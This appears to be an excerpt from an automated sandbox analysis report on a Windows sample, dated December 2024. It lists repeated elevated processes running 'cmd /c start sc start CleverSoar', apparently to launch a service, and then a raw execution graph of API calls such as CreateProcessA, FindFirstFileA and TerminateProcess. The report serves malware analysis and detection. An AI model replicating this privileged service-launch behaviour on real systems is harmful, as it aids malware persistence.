                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:94
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:95
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:96
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:97
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:98
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:99
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:100
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:101
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:102
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:103
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:104
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:105
                              Start time:23:07:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:106
                              Start time:23:07:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:107
                              Start time:23:07:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:108
                              Start time:23:07:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:1.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:15.7%
                                Total number of Nodes:782
                                Total number of Limit Nodes:10
                                execution_graph 99038 6ce5cad3 99039 6ce5cae5 __dosmaperr 99038->99039 99040 6ce5cafd 99038->99040 99040->99039 99041 6ce5cb77 99040->99041 99043 6ce5cb48 __dosmaperr 99040->99043 99044 6ce5cb90 99041->99044 99045 6ce5cbe7 __wsopen_s 99041->99045 99046 6ce5cbab __dosmaperr 99041->99046 99085 6ce50120 18 API calls __cftoe 99043->99085 99044->99046 99065 6ce5cb95 99044->99065 99079 6ce547bb HeapFree GetLastError _free 99045->99079 99078 6ce50120 18 API calls __cftoe 99046->99078 99049 6ce5cd3e 99052 6ce5cdb4 99049->99052 99055 6ce5cd57 GetConsoleMode 99049->99055 99050 6ce5cc07 99080 6ce547bb HeapFree GetLastError _free 99050->99080 99054 6ce5cdb8 ReadFile 99052->99054 99057 6ce5cdd2 99054->99057 99058 6ce5ce2c GetLastError 99054->99058 99055->99052 99059 6ce5cd68 99055->99059 99056 6ce5cc0e 99069 6ce5cbc2 __dosmaperr __wsopen_s 99056->99069 99081 6ce5ac69 20 API calls __wsopen_s 99056->99081 99057->99058 99060 6ce5cda9 99057->99060 99058->99069 99059->99054 99061 6ce5cd6e ReadConsoleW 99059->99061 99066 6ce5cdf7 99060->99066 99067 6ce5ce0e 99060->99067 99060->99069 99061->99060 99064 6ce5cd8a GetLastError 99061->99064 99064->99069 99073 6ce619e5 99065->99073 99083 6ce5cefe 23 API calls 3 library calls 99066->99083 99068 6ce5ce25 99067->99068 99067->99069 99084 6ce5d1b6 21 API calls __wsopen_s 99068->99084 99082 6ce547bb HeapFree GetLastError _free 99069->99082 99072 6ce5ce2a 99072->99069 99074 6ce619f2 99073->99074 99076 6ce619ff 99073->99076 99074->99049 99075 6ce61a0b 99075->99049 99076->99075 99086 6ce50120 18 API calls __cftoe 99076->99086 99078->99069 99079->99050 99080->99056 99081->99065 99082->99039 99083->99069 99084->99072 99085->99039 99086->99074 99087 6ccd4a27 99091 6ccd4a5d _strlen 99087->99091 99088 6cce639e 99219 6ce50130 18 API calls 2 library calls 99088->99219 99089 6ccd5b6f 99093 6ce46a43 std::_Facet_Register 4 API calls 99089->99093 99090 6ccd5b58 99205 6ce46a43 99090->99205 99091->99088 99091->99089 99091->99090 99095 6ccd5b09 _Yarn 99091->99095 99093->99095 99178 6ce3aec0 99095->99178 99098 6ccd5bad std::ios_base::_Ios_base_dtor 99098->99088 99101 6ccd9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 99098->99101 99184 6ce44ff0 CreateProcessA 99098->99184 99099 6ce46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 99099->99101 99100 6ce3aec0 2 API calls 99100->99101 99101->99088 99101->99099 99101->99100 99102 6ccda292 Sleep 99101->99102 99108 6ccde619 99101->99108 99110 6ccd9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 99102->99110 99103 6ccd660d 99105 6ce46a43 std::_Facet_Register 4 API calls 99103->99105 99104 6ccd6624 99106 6ce46a43 std::_Facet_Register 4 API calls 99104->99106 99113 6ccd65bc _Yarn _strlen 99105->99113 99106->99113 99107 6ccd61cb _strlen 99107->99088 99107->99103 99107->99104 99107->99113 99122 6ccdf243 CreateFileA 99108->99122 99109 6ce44ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 99109->99110 99110->99088 99110->99101 99110->99109 99111 6ccd9bbd GetCurrentProcess TerminateProcess 99110->99111 99112 6cce63b2 99110->99112 99127 6ce46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 99110->99127 99156 6ce45960 104 API calls 99110->99156 99111->99101 99220 6ccc15e0 18 API calls std::ios_base::_Ios_base_dtor 99112->99220 99113->99112 99116 6ccd6989 99113->99116 99117 6ccd6970 99113->99117 99121 6ccd6920 _Yarn 99113->99121 99115 6cce64f8 99119 6ce46a43 std::_Facet_Register 4 API calls 99116->99119 99118 6ce46a43 std::_Facet_Register 4 API calls 99117->99118 99118->99121 99119->99121 99188 6ce45960 99121->99188 99138 6ccdf2a7 99122->99138 99123 6ccd69d6 std::ios_base::_Ios_base_dtor _strlen 99123->99088 99124 6ccd6dbb 99123->99124 99125 6ccd6dd2 99123->99125 99137 6ccd6d69 _Yarn _strlen 99123->99137 99128 6ce46a43 std::_Facet_Register 4 API calls 99124->99128 99129 6ce46a43 std::_Facet_Register 4 API calls 99125->99129 99126 6cce02ca 99127->99110 99128->99137 99129->99137 99130 6ccd7427 99132 6ce46a43 std::_Facet_Register 4 API calls 99130->99132 99131 6ccd7440 99133 6ce46a43 std::_Facet_Register 4 API calls 99131->99133 99134 6ccd73da _Yarn 99132->99134 99133->99134 99136 6ce45960 104 API calls 99134->99136 99135 6cce02ac GetCurrentProcess TerminateProcess 99135->99126 99139 6ccd748d std::ios_base::_Ios_base_dtor _strlen 99136->99139 99137->99112 99137->99130 99137->99131 99137->99134 99138->99126 99138->99135 99139->99088 99140 6ccd79a8 99139->99140 99141 6ccd7991 99139->99141 99146 6ccd7940 _Yarn _strlen 99139->99146 99143 6ce46a43 std::_Facet_Register 4 API calls 99140->99143 99142 6ce46a43 std::_Facet_Register 4 API calls 99141->99142 99142->99146 99143->99146 99144 6ccd7dc9 99147 6ce46a43 std::_Facet_Register 4 API calls 99144->99147 99145 6ccd7de2 99148 6ce46a43 std::_Facet_Register 4 API calls 99145->99148 99146->99112 99146->99144 99146->99145 99149 6ccd7d7c _Yarn 99146->99149 99147->99149 99148->99149 99150 6ce45960 104 API calls 99149->99150 99151 6ccd7e2f std::ios_base::_Ios_base_dtor _strlen 99150->99151 99151->99088 99152 6ccd85bf 99151->99152 99153 6ccd85a8 99151->99153 99162 6ccd8556 _Yarn _strlen 99151->99162 99155 6ce46a43 std::_Facet_Register 4 API calls 99152->99155 99154 6ce46a43 std::_Facet_Register 4 API calls 99153->99154 99154->99162 99155->99162 99156->99110 99157 6ccd896a 99159 6ce46a43 std::_Facet_Register 4 API calls 99157->99159 99158 6ccd8983 99160 6ce46a43 std::_Facet_Register 4 API calls 99158->99160 99161 6ccd891d _Yarn 99159->99161 99160->99161 99163 6ce45960 104 API calls 99161->99163 99162->99112 99162->99157 99162->99158 99162->99161 99164 6ccd89d0 std::ios_base::_Ios_base_dtor _strlen 99163->99164 99164->99088 99165 6ccd8f1f 99164->99165 99166 6ccd8f36 99164->99166 99169 6ccd8ecd _Yarn _strlen 99164->99169 99167 6ce46a43 std::_Facet_Register 4 API calls 99165->99167 99168 6ce46a43 std::_Facet_Register 4 API calls 99166->99168 99167->99169 99168->99169 99169->99112 99170 6ccd936d 99169->99170 99171 6ccd9354 99169->99171 99174 6ccd9307 _Yarn 99169->99174 99173 6ce46a43 std::_Facet_Register 4 API calls 99170->99173 99172 6ce46a43 std::_Facet_Register 4 API calls 99171->99172 99172->99174 99173->99174 99175 6ce45960 104 API calls 99174->99175 99177 6ccd93ba std::ios_base::_Ios_base_dtor 99175->99177 99176 6ce44ff0 4 API calls 99176->99101 99177->99088 99177->99176 99179 6ce3aed6 FindFirstFileA 99178->99179 99180 6ce3aed4 99178->99180 99181 6ce3af10 99179->99181 99180->99179 99182 6ce3af72 99181->99182 99183 6ce3af14 FindClose 99181->99183 99182->99098 99183->99181 99185 6ce450ca 99184->99185 99186 6ce45080 WaitForSingleObject CloseHandle CloseHandle 99185->99186 99187 6ce450e3 99185->99187 99186->99185 99187->99107 99189 6ce459b7 99188->99189 99221 6ce45ff0 99189->99221 99191 6ce459c8 99240 6cce6ba0 99191->99240 99193 6ce45a67 99292 6cd0e010 99193->99292 99195 6ce45a9f std::ios_base::_Ios_base_dtor 99197 6cd0e010 67 API calls 99195->99197 99200 6ce45ae2 std::ios_base::_Ios_base_dtor 99197->99200 99198 6ce45a54 99277 6ce45b90 99198->99277 99199 6ce459ec 99199->99193 99199->99198 99259 6ce46340 99199->99259 99267 6cd22000 99199->99267 99200->99123 99203 6ce45a5c 99298 6cce7090 99203->99298 99207 6ce46a48 99205->99207 99206 6ce46a62 99206->99095 99207->99206 99210 6ce46a64 std::_Facet_Register 99207->99210 99751 6ce4f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 99207->99751 99209 6ce478c3 std::_Facet_Register 99755 6ce49379 RaiseException 99209->99755 99210->99209 99752 6ce49379 RaiseException 99210->99752 99212 6ce480bc IsProcessorFeaturePresent 99218 6ce480e1 99212->99218 99214 6ce47883 99753 6ce49379 RaiseException 99214->99753 99216 6ce478a3 std::invalid_argument::invalid_argument 99754 6ce49379 RaiseException 99216->99754 99218->99095 99220->99115 99222 6ce46025 99221->99222 99311 6cd12020 99222->99311 99224 6ce460c6 99225 6ce46a43 std::_Facet_Register 4 API calls 99224->99225 99226 6ce460fe 99225->99226 99328 6ce47327 99226->99328 99228 6ce46112 99340 6cd11d90 99228->99340 99231 6ce461ec 99231->99191 99233 6ce46226 99348 6cd126e0 24 API calls 4 library calls 99233->99348 99235 6ce46238 99349 6ce49379 RaiseException 99235->99349 99237 6ce4624d 99238 6cd0e010 67 API calls 99237->99238 99239 6ce4625f 99238->99239 99239->99191 99241 6cce6bd5 99240->99241 99242 6cd12020 52 API calls 99241->99242 99243 6cce6c68 99242->99243 99244 6ce46a43 std::_Facet_Register 4 API calls 99243->99244 99245 6cce6ca0 99244->99245 99246 6ce47327 43 API calls 99245->99246 99247 6cce6cb4 99246->99247 99248 6cd11d90 89 API calls 99247->99248 99249 6cce6d5d 99248->99249 99250 6cce6d8e 99249->99250 99659 6cd12250 30 API calls 99249->99659 99250->99199 99252 6cce6dc8 99660 6cd126e0 24 API calls 4 library calls 99252->99660 99254 6cce6dda 99661 6ce49379 RaiseException 99254->99661 99256 6cce6def 99257 6cd0e010 67 API calls 99256->99257 99258 6cce6e0f 99257->99258 99258->99199 99260 6ce4638d 99259->99260 99662 6ce465a0 99260->99662 99262 6ce4647c 99262->99199 99265 6ce463a5 99265->99262 99680 6cd12250 30 API calls 99265->99680 99681 6cd126e0 24 API calls 4 library calls 99265->99681 99682 6ce49379 RaiseException 99265->99682 99268 6cd2203f 99267->99268 99271 6cd22053 99268->99271 99691 6cd13560 32 API calls std::_Xinvalid_argument 99268->99691 99274 6cd2210e 99271->99274 99693 6cd12250 30 API calls 99271->99693 99694 6cd126e0 24 API calls 4 library calls 99271->99694 99695 6ce49379 RaiseException 99271->99695 99273 6cd22121 99273->99199 99274->99273 99692 6cd137e0 32 API calls std::_Xinvalid_argument 99274->99692 99278 6ce45b9e 99277->99278 99282 6ce45bd1 99277->99282 99696 6cd101f0 99278->99696 99280 6ce45c83 99280->99203 99282->99280 99700 6cd12250 30 API calls 99282->99700 99283 6ce50b18 67 API calls 99283->99282 99285 6ce45cae 99701 6cd12340 24 API calls 99285->99701 99287 6ce45cbe 99702 6ce49379 RaiseException 99287->99702 99289 6ce45cc9 99290 6cd0e010 67 API calls 99289->99290 99291 6ce45d22 std::ios_base::_Ios_base_dtor 99290->99291 99291->99203 99293 6cd0e04b 99292->99293 99294 6cd0e0a3 99293->99294 99295 6cd101f0 64 API calls 99293->99295 99294->99195 99296 6cd0e098 99295->99296 99297 6ce50b18 67 API calls 99296->99297 99297->99294 99299 6cce709e 99298->99299 99302 6cce70d1 99298->99302 99300 6cd101f0 64 API calls 99299->99300 99303 6cce70c4 99300->99303 99301 6cce7183 99301->99193 99302->99301 99748 6cd12250 30 API calls 99302->99748 99305 6ce50b18 67 API calls 99303->99305 99305->99302 99306 6cce71ae 99749 6cd12340 24 API calls 99306->99749 99308 6cce71be 99750 6ce49379 RaiseException 99308->99750 99310 6cce71c9 99312 6ce46a43 std::_Facet_Register 4 API calls 99311->99312 99313 6cd1207e 99312->99313 99314 6ce47327 43 API calls 99313->99314 99315 6cd12092 99314->99315 99350 6cd12f60 42 API calls 4 library calls 99315->99350 99317 6cd120c8 99318 6cd1210d 99317->99318 99319 6cd12136 99317->99319 99320 6cd12120 99318->99320 99351 6ce46f8e 9 API calls 2 library calls 99318->99351 99352 6cd12250 30 API calls 99319->99352 99320->99224 99323 6cd1215b 99353 6cd12340 24 API calls 99323->99353 99325 6cd12171 99354 6ce49379 RaiseException 99325->99354 99327 6cd1217c 99327->99224 99329 6ce47333 __EH_prolog3 99328->99329 99355 6ce46eb5 99329->99355 99333 6ce47351 99369 6ce473ba 39 API calls std::locale::_Setgloballocale 99333->99369 99335 6ce473ac 99335->99228 99337 6ce47359 99370 6ce471b1 HeapFree GetLastError _Yarn 99337->99370 99339 6ce4736f 99361 6ce46ee6 99339->99361 99341 6cd11dc7 99340->99341 99342 6cd11ddc 99340->99342 99341->99231 99347 6cd12250 30 API calls 99341->99347 99375 6ce47447 99342->99375 99346 6cd11e82 99347->99233 99348->99235 99349->99237 99350->99317 99351->99320 99352->99323 99353->99325 99354->99327 99356 6ce46ec4 99355->99356 99357 6ce46ecb 99355->99357 99371 6ce503cd 6 API calls std::_Lockit::_Lockit 99356->99371 99359 6ce46ec9 99357->99359 99372 6ce4858b EnterCriticalSection 99357->99372 99359->99339 99368 6ce47230 6 API calls 2 library calls 99359->99368 99362 6ce46ef0 99361->99362 99363 6ce503db 99361->99363 99364 6ce46f03 99362->99364 99373 6ce48599 LeaveCriticalSection 99362->99373 99374 6ce503b6 LeaveCriticalSection 99363->99374 99364->99335 99367 6ce503e2 99367->99335 99368->99333 99369->99337 99370->99339 99371->99359 99372->99359 99373->99364 99374->99367 99376 6ce47450 99375->99376 99377 6cd11dea 99376->99377 99384 6ce4fd4a 99376->99384 99377->99341 99383 6ce4c563 18 API calls __cftoe 99377->99383 99379 6ce4749c 99379->99377 99395 6ce4fa58 65 API calls 99379->99395 99381 6ce474b7 99381->99377 99396 6ce50b18 99381->99396 99383->99346 99385 6ce4fd55 __wsopen_s 99384->99385 99386 6ce4fd68 99385->99386 99387 6ce4fd88 99385->99387 99421 6ce50120 18 API calls __cftoe 99386->99421 99394 6ce4fd78 99387->99394 99407 6ce5ae0c 99387->99407 99394->99379 99395->99381 99397 6ce50b24 __wsopen_s 99396->99397 99398 6ce50b43 99397->99398 99399 6ce50b2e 99397->99399 99403 6ce50b3e 99398->99403 99530 6ce4c5a9 EnterCriticalSection 99398->99530 99545 6ce50120 18 API calls __cftoe 99399->99545 99402 6ce50b60 99531 6ce50b9c 99402->99531 99403->99377 99405 6ce50b6b 99546 6ce50b92 LeaveCriticalSection 99405->99546 99408 6ce5ae18 __wsopen_s 99407->99408 99423 6ce5039f EnterCriticalSection 99408->99423 99410 6ce5ae26 99424 6ce5aeb0 99410->99424 99415 6ce5af72 99416 6ce5b091 99415->99416 99448 6ce5b114 99416->99448 99419 6ce4fdcc 99422 6ce4fdf5 LeaveCriticalSection 99419->99422 99421->99394 99422->99394 99423->99410 99432 6ce5aed3 99424->99432 99425 6ce5ae33 99438 6ce5ae6c 99425->99438 99426 6ce5af2b 99443 6ce571e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 99426->99443 99428 6ce5af34 99444 6ce547bb HeapFree GetLastError _free 99428->99444 99431 6ce5af3d 99431->99425 99445 6ce56c1f 6 API calls std::_Lockit::_Lockit 99431->99445 99432->99425 99432->99426 99432->99432 99441 6ce4c5a9 EnterCriticalSection 99432->99441 99442 6ce4c5bd LeaveCriticalSection 99432->99442 99434 6ce5af5c 99446 6ce4c5a9 EnterCriticalSection 99434->99446 99437 6ce5af6f 99437->99425 99447 6ce503b6 LeaveCriticalSection 99438->99447 99440 6ce4fda3 99440->99394 99440->99415 99441->99432 99442->99432 99443->99428 99444->99431 99445->99434 99446->99437 99447->99440 99449 6ce5b133 99448->99449 99450 6ce5b146 99449->99450 99454 6ce5b15b 99449->99454 99464 6ce50120 18 API calls __cftoe 99450->99464 99452 6ce5b27b 99453 6ce5b0a7 99452->99453 99468 6ce50120 18 API calls __cftoe 99452->99468 99453->99419 99461 6ce63fde 99453->99461 99454->99452 99465 6ce63ea8 37 API calls __cftoe 99454->99465 99457 6ce5b2cb 99457->99452 99466 6ce63ea8 37 API calls __cftoe 99457->99466 99459 6ce5b2e9 99459->99452 99467 6ce63ea8 37 API calls __cftoe 99459->99467 99469 6ce64396 99461->99469 99464->99453 99465->99457 99466->99459 99467->99452 99468->99453 99471 6ce643a2 __wsopen_s 99469->99471 99470 6ce643a9 99487 6ce50120 18 API calls __cftoe 99470->99487 99471->99470 99472 6ce643d4 99471->99472 99478 6ce63ffe 99472->99478 99477 6ce63ff9 99477->99419 99489 6ce506cb 99478->99489 99483 6ce64034 99485 6ce64066 99483->99485 99529 6ce547bb HeapFree GetLastError _free 99483->99529 99488 6ce6442b LeaveCriticalSection __wsopen_s 99485->99488 99487->99477 99488->99477 99490 6ce4bceb __fassign 37 API calls 99489->99490 99491 6ce506dd 99490->99491 99492 6ce506ef 99491->99492 99493 6ce569d5 __wsopen_s 5 API calls 99491->99493 99494 6ce4bdf6 99492->99494 99493->99492 99495 6ce4be4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 99494->99495 99496 6ce4be0e 99495->99496 99496->99483 99497 6ce6406c 99496->99497 99498 6ce644ec __wsopen_s 18 API calls 99497->99498 99499 6ce64089 99498->99499 99500 6ce6160c __wsopen_s 14 API calls 99499->99500 99504 6ce6409e __dosmaperr 99499->99504 99501 6ce640bc 99500->99501 99502 6ce64457 __wsopen_s CreateFileW 99501->99502 99501->99504 99509 6ce64115 99502->99509 99503 6ce64192 GetFileType 99506 6ce641e4 99503->99506 99507 6ce6419d GetLastError 99503->99507 99504->99483 99505 6ce64167 GetLastError 99505->99504 99512 6ce617b0 __wsopen_s SetStdHandle 99506->99512 99508 6ce4f9f2 __dosmaperr 99507->99508 99510 6ce641ab CloseHandle 99508->99510 99509->99503 99509->99505 99511 6ce64457 __wsopen_s CreateFileW 99509->99511 99510->99504 99525 6ce641d4 99510->99525 99513 6ce6415a 99511->99513 99514 6ce64205 99512->99514 99513->99503 99513->99505 99515 6ce64251 99514->99515 99517 6ce64666 __wsopen_s 70 API calls 99514->99517 99516 6ce64710 __wsopen_s 70 API calls 99515->99516 99520 6ce64258 99515->99520 99518 6ce64286 99516->99518 99517->99515 99519 6ce64294 99518->99519 99518->99520 99519->99504 99522 6ce64310 CloseHandle 99519->99522 99521 6ce5b925 __wsopen_s 21 API calls 99520->99521 99521->99504 99523 6ce64457 __wsopen_s CreateFileW 99522->99523 99524 6ce6433b 99523->99524 99524->99525 99526 6ce64345 GetLastError 99524->99526 99525->99504 99527 6ce64351 __dosmaperr 99526->99527 99528 6ce6171f __wsopen_s SetStdHandle 99527->99528 99528->99525 99529->99485 99530->99402 99532 6ce50bbe 99531->99532 99533 6ce50ba9 99531->99533 99538 6ce50bb9 99532->99538 99547 6ce50cb9 99532->99547 99569 6ce50120 18 API calls __cftoe 99533->99569 99538->99405 99541 6ce50be1 99562 6ce5b898 99541->99562 99543 6ce50be7 99543->99538 99570 6ce547bb HeapFree GetLastError _free 99543->99570 99545->99403 99546->99403 99548 6ce50bd3 99547->99548 99549 6ce50cd1 99547->99549 99553 6ce5873e 99548->99553 99549->99548 99550 6ce59c60 18 API calls 99549->99550 99551 6ce50cef 99550->99551 99571 6ce5bb6c 99551->99571 99554 6ce58755 99553->99554 99555 6ce50bdb 99553->99555 99554->99555 99627 6ce547bb HeapFree GetLastError _free 99554->99627 99557 6ce59c60 99555->99557 99558 6ce59c81 99557->99558 99559 6ce59c6c 99557->99559 99558->99541 99628 6ce50120 18 API calls __cftoe 99559->99628 99561 6ce59c7c 99561->99541 99563 6ce5b8be 99562->99563 99567 6ce5b8a9 __dosmaperr 99562->99567 99564 6ce5b8e5 99563->99564 99566 6ce5b907 __dosmaperr 99563->99566 99629 6ce5b9c1 99564->99629 99637 6ce50120 18 API calls __cftoe 99566->99637 99567->99543 99569->99538 99570->99538 99572 6ce5bb78 __wsopen_s 99571->99572 99573 6ce5bbca 99572->99573 99575 6ce5bc33 __dosmaperr 99572->99575 99578 6ce5bb80 __dosmaperr 99572->99578 99582 6ce61990 EnterCriticalSection 99573->99582 99612 6ce50120 18 API calls __cftoe 99575->99612 99576 6ce5bbd0 99580 6ce5bbec __dosmaperr 99576->99580 99583 6ce5bc5e 99576->99583 99578->99548 99611 6ce5bc2b LeaveCriticalSection __wsopen_s 99580->99611 99582->99576 99584 6ce5bc80 99583->99584 99610 6ce5bc9c __dosmaperr 99583->99610 99585 6ce5bcd4 99584->99585 99587 6ce5bc84 __dosmaperr 99584->99587 99586 6ce5bce7 99585->99586 99621 6ce5ac69 20 API calls __wsopen_s 99585->99621 99613 6ce5be40 99586->99613 99620 6ce50120 18 API calls __cftoe 99587->99620 99592 6ce5bcfd 99596 6ce5bd26 99592->99596 99601 6ce5bd01 99592->99601 99593 6ce5bd3c 99594 6ce5bd95 WriteFile 99593->99594 99595 6ce5bd50 99593->99595 99597 6ce5bdb9 GetLastError 99594->99597 99594->99610 99599 6ce5bd85 99595->99599 99600 6ce5bd5b 99595->99600 99623 6ce5beb1 43 API calls 5 library calls 99596->99623 99597->99610 99626 6ce5c2c3 7 API calls 2 library calls 99599->99626 99602 6ce5bd75 99600->99602 99603 6ce5bd60 99600->99603 99601->99610 99622 6ce5c25b 6 API calls __wsopen_s 99601->99622 99625 6ce5c487 8 API calls 3 library calls 99602->99625 99607 6ce5bd65 99603->99607 99603->99610 99606 6ce5bd73 99606->99610 99624 6ce5c39e 7 API calls 2 library calls 99607->99624 99610->99580 99611->99578 99612->99578 99614 6ce619e5 __wsopen_s 18 API calls 99613->99614 99615 6ce5be51 99614->99615 99616 6ce5bcf8 99615->99616 99617 6ce549b2 __Getctype 37 API calls 99615->99617 99616->99592 99616->99593 99618 6ce5be74 99617->99618 99618->99616 99619 6ce5be8e GetConsoleMode 99618->99619 99619->99616 99620->99610 99621->99586 99622->99610 99623->99610 99624->99606 99625->99606 99626->99606 99627->99555 99628->99561 99630 6ce5b9cd __wsopen_s 99629->99630 99638 6ce61990 EnterCriticalSection 99630->99638 99632 6ce5b9db 99634 6ce5ba08 99632->99634 99639 6ce5b925 99632->99639 99652 6ce5ba41 LeaveCriticalSection __wsopen_s 99634->99652 99636 6ce5ba2a 99636->99567 99637->99567 99638->99632 99653 6ce615a2 99639->99653 99641 6ce5b93b 99658 6ce6171f SetStdHandle __dosmaperr __wsopen_s 99641->99658 99642 6ce5b935 99642->99641 99644 6ce5b96d 99642->99644 99645 6ce615a2 __wsopen_s 18 API calls 99642->99645 99644->99641 99646 6ce615a2 __wsopen_s 18 API calls 99644->99646 99647 6ce5b964 99645->99647 99648 6ce5b979 CloseHandle 99646->99648 99649 6ce615a2 __wsopen_s 18 API calls 99647->99649 99648->99641 99650 6ce5b985 GetLastError 99648->99650 99649->99644 99650->99641 99651 6ce5b993 __dosmaperr 99651->99634 99652->99636 99655 6ce615af __dosmaperr 99653->99655 99656 6ce615c4 __dosmaperr 99653->99656 99654 6ce615e9 99654->99642 99655->99642 99656->99654 99657 6ce50120 __cftoe 18 API calls 99656->99657 99657->99655 99658->99651 99659->99252 99660->99254 99661->99256 99663 6ce465dc 